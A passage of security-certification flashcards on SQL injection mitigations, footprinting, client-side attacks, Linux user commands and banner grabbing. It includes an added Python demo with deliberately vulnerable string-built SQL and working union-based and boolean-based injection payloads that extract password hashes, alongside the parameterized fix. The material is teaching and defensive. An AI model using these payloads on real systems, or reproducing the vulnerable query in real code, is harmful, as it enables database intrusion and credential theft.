Use Stored Procedures – Encapsulate SQL logic on the database side, limiting direct SQL execution (only safe if the procedure itself does not build dynamic SQL from its arguments).

Least Privilege Principle – Limit database user permissions to only what's necessary, so a successful injection cannot read or alter unrelated tables.

Web Application Firewalls (WAFs) – Detect and block SQL injection attempts.

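
As an added example (not from the original flashcards) covering both the SQL injection types card (41) and the mitigations here, the Python below runs a union-based and a boolean-based payload against a string-built query and then against the parameterized version of the same query, using an in-memory SQLite database with constructed rows; the schema, table names and payloads are assumptions for the demo.

```python
"""Union- and boolean-based SQL injection against string-built SQL, and the parameterized fix (added example).

Uses an in-memory SQLite database with constructed rows; the schema, table
names and payloads are assumptions for the demo, not taken from a real application.
"""
import sqlite3


def make_db() -> sqlite3.Connection:
    con = sqlite3.connect(":memory:")
    con.executescript("""
        CREATE TABLE users(id INTEGER PRIMARY KEY, username TEXT, password_hash TEXT, role TEXT);
        INSERT INTO users(username, password_hash, role)
            VALUES ('alice', 'hash-a', 'admin'), ('bob', 'hash-b', 'user');
        CREATE TABLE products(id INTEGER PRIMARY KEY, name TEXT, price REAL);
        INSERT INTO products(name, price) VALUES ('widget', 9.99), ('gadget', 19.99);
    """)
    return con


def search_vulnerable(con: sqlite3.Connection, term: str) -> list:
    """Deliberately vulnerable: user input is spliced into the SQL text."""
    sql = f"SELECT name, price FROM products WHERE name = '{term}'"
    return con.execute(sql).fetchall()


def search_safe(con: sqlite3.Connection, term: str) -> list:
    """Parameterized query: the value travels separately from the SQL code,
    so quotes, UNION and comment markers inside it are only ever data."""
    return con.execute("SELECT name, price FROM products WHERE name = ?", (term,)).fetchall()


# Attacker-controlled inputs.  The trailing '--' comments out the closing quote
# of the original query so the statement stays syntactically valid.
UNION_PAYLOAD = "x' UNION SELECT username, password_hash FROM users--"
BOOLEAN_TRUE = "widget' AND 1=1--"
BOOLEAN_FALSE = "widget' AND 1=2--"


def boolean_oracle(con: sqlite3.Connection, query) -> bool:
    """Boolean-based inference: does the injected condition change the response?"""
    return query(con, BOOLEAN_TRUE) != query(con, BOOLEAN_FALSE)


if __name__ == "__main__":
    con = make_db()
    print("vulnerable, union payload :", search_vulnerable(con, UNION_PAYLOAD))
    print("safe, same payload        :", search_safe(con, UNION_PAYLOAD))
    print("vulnerable is injectable  :", boolean_oracle(con, search_vulnerable))
    print("safe is injectable        :", boolean_oracle(con, search_safe))
```

The union payload works only because the injected SELECT returns the same number of columns as the original; in a real engagement that count is found by trial with ORDER BY n or UNION SELECT NULL,NULL,... and the boolean oracle is what sqlmap automates one character at a time.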
48
Q

Which of the following tools will allow you to perform footprinting undetected?

A

whois

whois queries registrar and regional registry databases, not the target's own systems, so the target sees no traffic (passive footprinting). Active tools such as nmap send packets to the target and can be logged.

49
Q

Which of the following is a client-side attack?

A

A client-side attack targets the user's device or browser rather than the server. Examples include:

Cross-Site Scripting (XSS) — Injects malicious scripts into webpages viewed by users.

Clickjacking — Tricks users into clicking hidden elements.

Malicious browser extensions or plugins.

Drive-by downloads — Automatically downloading malware when visiting a webpage.

In contrast:
SQL injection or server-side code injections target the server.
Denial of Service (DoS) attacks target server availability.

50
Q

Which commands can be used to identify users in a Linux Bash shell?

A

who — Shows who is currently logged in.

w — Displays logged-in users and their activities.

id — Shows user ID (UID), group ID (GID), and group memberships of the current or specified user.

users — Lists the logged-in users.

finger — Provides detailed info about users (if installed).

last — Shows last logged-in users history.

51
Q

banner grabbing

A

Collecting version information from running services, e.g. the greeting an SSH or SMTP daemon sends on connect (nc [host] 22) or the Server header in an HTTP response. nmap -sV automates this.

52
Q

Which command allows you to view all currently running processes and filter for a specific service, say, "httpd"?

A

ps aux | grep httpd

The grep process matches its own command line and shows up in the output; use grep [h]ttpd or pgrep -a httpd to exclude it.